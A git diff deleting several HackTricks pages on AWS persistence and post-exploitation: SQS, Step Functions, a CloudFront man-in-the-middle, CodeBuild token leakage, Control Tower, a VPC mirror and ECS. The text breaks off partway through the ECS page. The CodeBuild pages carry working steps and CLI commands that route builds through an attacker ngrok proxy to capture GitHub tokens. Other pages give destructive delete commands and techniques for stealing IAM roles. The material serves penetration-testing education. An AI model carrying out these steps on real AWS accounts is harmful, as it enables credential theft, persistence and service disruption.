Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md deleted file mode 100644 index 88c12a549..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md +++ /dev/null @@ -1,68 +0,0 @@ -# AWS - SQS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -For more information check: - -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} - -### Using resource policy - -In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**: - -```json -{ - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__owner_statement", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "SQS:*" - ], - "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" - } - ] -} -``` - -{% hint style="info" %} -You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} -{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md deleted file mode 100644 index 0c7b2c9e4..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - Step Functions Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Step Functions - -For more information check: - -{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} -[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) -{% endcontent-ref %} - -### Step function Backdooring - -Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps. - -### Backdooring aliases - -If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md deleted file mode 100644 index 8a7a800b7..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md +++ /dev/null @@ -1,57 +0,0 @@ -# AWS - CloudFront Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CloudFront - -For more information check: - -{% content-ref url="../aws-services/aws-cloudfront-enum.md" %} -[aws-cloudfront-enum.md](../aws-services/aws-cloudfront-enum.md) -{% endcontent-ref %} - -### Man-in-the-Middle - -This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script). - -#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket - -* **Create** the malicious **function**. -* **Associate** it with the CloudFront distribution. -* Set the **event type to "Viewer Response"**. - -Accessing the response you could steal the users cookie and inject a malicious JS. - -#### scenario 2: MitM where CloudFront is already using a lambda function - -* **Modify the code** of the lambda function to steal sensitive information - -You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md deleted file mode 100644 index d0db82e8c..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md +++ /dev/null @@ -1,111 +0,0 @@ -# AWS - CodeBuild Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CodeBuild - -For more information, check: - -{% content-ref url="../../aws-services/aws-codebuild-enum.md" %} -[aws-codebuild-enum.md](../../aws-services/aws-codebuild-enum.md) -{% endcontent-ref %} - -### Check Secrets - -If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\ -Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform. - -{% content-ref url="../../aws-privilege-escalation/aws-secrets-manager-privesc.md" %} -[aws-secrets-manager-privesc.md](../../aws-privilege-escalation/aws-secrets-manager-privesc.md) -{% endcontent-ref %} - -### Abuse CodeBuild Repo Access - -In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code: - -
- -The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**. - -An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\ -In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you): - -
- -And **change the Buildspec commands to exfiltrate each repo**. - -{% hint style="warning" %} -However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\ -Or does he? Check the next section -{% endhint %} - -### Leaking Access Tokens from AWS CodeBuild - -You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with: - -```bash -aws codebuild list-source-credentials -``` - -{% content-ref url="aws-codebuild-token-leakage.md" %} -[aws-codebuild-token-leakage.md](aws-codebuild-token-leakage.md) -{% endcontent-ref %} - -### `codebuild:DeleteProject` - -An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project. - -```bash -aws codebuild delete-project --name -``` - -**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project. - -### `codebuild:TagResource` , `codebuild:UntagResource` - -An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - -```bash -aws codebuild tag-resource --resource-arn --tags -aws codebuild untag-resource --resource-arn --tag-keys -``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. - -### `codebuild:DeleteSourceCredentials` - -An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository. - -```sql -aws codebuild delete-source-credentials --arn -``` - -**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md deleted file mode 100644 index 51a05bbb1..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md +++ /dev/null @@ -1,222 +0,0 @@ -# AWS Codebuild - Token Leakage - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Recover Github/Bitbucket Configured Tokens - -First, check if there are any source credentials configured that you could leak: - -```bash -aws codebuild list-source-credentials -``` - -### Via Docker Image - -If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project. - -For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**. - -The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**. - -1. **Create & Upload your own Docker MitM image** - * Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**. - * **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. - * You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host - * Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) -2. **Set the environment** - * Create a **new Codebuild project** or **modify** the environment of an existing one. - * Set the project to use the **previously generated Docker image** - -
- -3. **Set the MitM proxy in your host** - -* As indicated in the **Github repo** you could use something like: - -```bash -mitmproxy --listen-port 4444 --allow-hosts "github.com" -``` - -{% hint style="success" %} -The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. -{% endhint %} - -4. **Run the build & capture the credentials** - -* You can see the token in the **Authorization** header: - -
- -This could also be done from the aws cli with something like - -{% code overflow="wrap" %} -```bash -# Create project using a Github connection -aws codebuild create-project --cli-input-json file:///tmp/buildspec.json - -## With /tmp/buildspec.json -{ - "name": "my-demo-project", - "source": { - "type": "GITHUB", - "location": "https://github.com/uname/repo", - "buildspec": "buildspec.yml" - }, - "artifacts": { - "type": "NO_ARTIFACTS" - }, - "environment": { - "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM - "image": "docker.io/carlospolop/docker-mitm:v12", - "computeType": "BUILD_GENERAL1_SMALL", - "imagePullCredentialsType": "CODEBUILD" - } -} - -## Json - -# Start the build -aws codebuild start-build --project-name my-project2 -``` -{% endcode %} - -### Via insecureSSL - -**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\ -Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform. - -* First you need to enumerate the current configuration with something like: - -```bash -aws codebuild batch-get-projects --name -``` - -* Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration). - * Moreover, add also the env variables **http\_proxy** and **https\_proxy** pointing to your tcp ngrok like: - -{% code overflow="wrap" %} -```bash -aws codebuild update-project --name \ - --source '{ - "type": "GITHUB", - "location": "https://github.com/carlospolop/404checker", - "gitCloneDepth": 1, - "gitSubmodulesConfig": { - "fetchSubmodules": false - }, - "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", - "auth": { - "type": "CODECONNECTIONS", - "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" - }, - "reportBuildStatus": false, - "insecureSsl": true - }' \ - --environment '{ - "type": "LINUX_CONTAINER", - "image": "aws/codebuild/standard:5.0", - "computeType": "BUILD_GENERAL1_SMALL", - "environmentVariables": [ - { - "name": "http_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - }, - { - "name": "https_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - } - ] - }' -``` -{% endcode %} - -* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy) - -```python -from mitm import MITM, protocol, middleware, crypto - -mitm = MITM( - host="0.0.0.0", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() -) -mitm.run() -``` - -* Next, click on **Build the project** or start the build from command line: - -```sh -aws codebuild start-build --project-name -``` - -* Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port: - -
- -### ~~Via HTTP protocol~~ - -{% hint style="success" %} -**This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)** -{% endhint %} - -An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**. - -* An attacker could add the environment variables **http\_proxy** and **https\_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`). - -
- -
- -* Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions` -* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy) - -```python -from mitm import MITM, protocol, middleware, crypto - -mitm = MITM( - host="127.0.0.1", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() -) -mitm.run() -``` - -* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: - -
- -{% hint style="warning" %} -Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md deleted file mode 100644 index 1fa4d4d49..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md +++ /dev/null @@ -1,48 +0,0 @@ -# AWS - Control Tower Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Control Tower - -{% content-ref url="../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md" %} -[aws-control-tower-enum.md](../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md) -{% endcontent-ref %} - -### Enable / Disable Controls - -To further exploit an account, you might need to disable/enable Control Tower controls: - -{% code overflow="wrap" %} -```bash -aws controltower disable-control --control-identifier --target-identifier -aws controltower enable-control --control-identifier --target-identifier -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md deleted file mode 100644 index 51e033417..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - Malicious VPC Mirror - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!** - -Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**. - -To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts. - -The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible. - -For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md deleted file mode 100644 index 096bdaea6..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md +++ /dev/null @@ -1,88 +0,0 @@ -# AWS - ECS Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECS - -For more information check: - -{% content-ref url="../aws-services/aws-ecs-enum.md" %} -[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) -{% endcontent-ref %} - -### Host IAM Roles - -In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\ -Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} - -{% hint style="danger" %} -Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance. -{% endhint %} - -### Privesc to node to steal other containers creds & secrets - -But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached. - -#### Making containers run in current host - -Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container. - -```bash -aws ecs update-container-instances-state \ - --cluster --status DRAINING --container-instances -``` - -The same technique can be done by **deregistering the EC2 instance from the cluster**. This is potentially less stealthy but it will **force the tasks to be run in other instances:** - -```bash -aws ecs deregister-container-instance \ - --cluster --container-instance --force -``` - -A final technique to force the re-execution of tasks is by indicating ECS that the **task or container was stopped**. There are 3 potential APIs to do this: - -```bash -# Needs: ecs:SubmitTaskStateChange -aws ecs submit-task-state-change --cluster \ - --status STOPPED --reason "anything" --containers [...] - -# Needs: ecs:SubmitContainerStateChange -aws ecs submit-container-state-change ... - -# Needs: ecs:SubmitAttachmentStateChanges -aws ecs submit-attachment-state-changes ... -``` - -### Steal sensitive info from ECR containers - -The EC2 instance will probably also have the permission `ecr:GetAuthorizationToken` allowing it to **download images** (you could 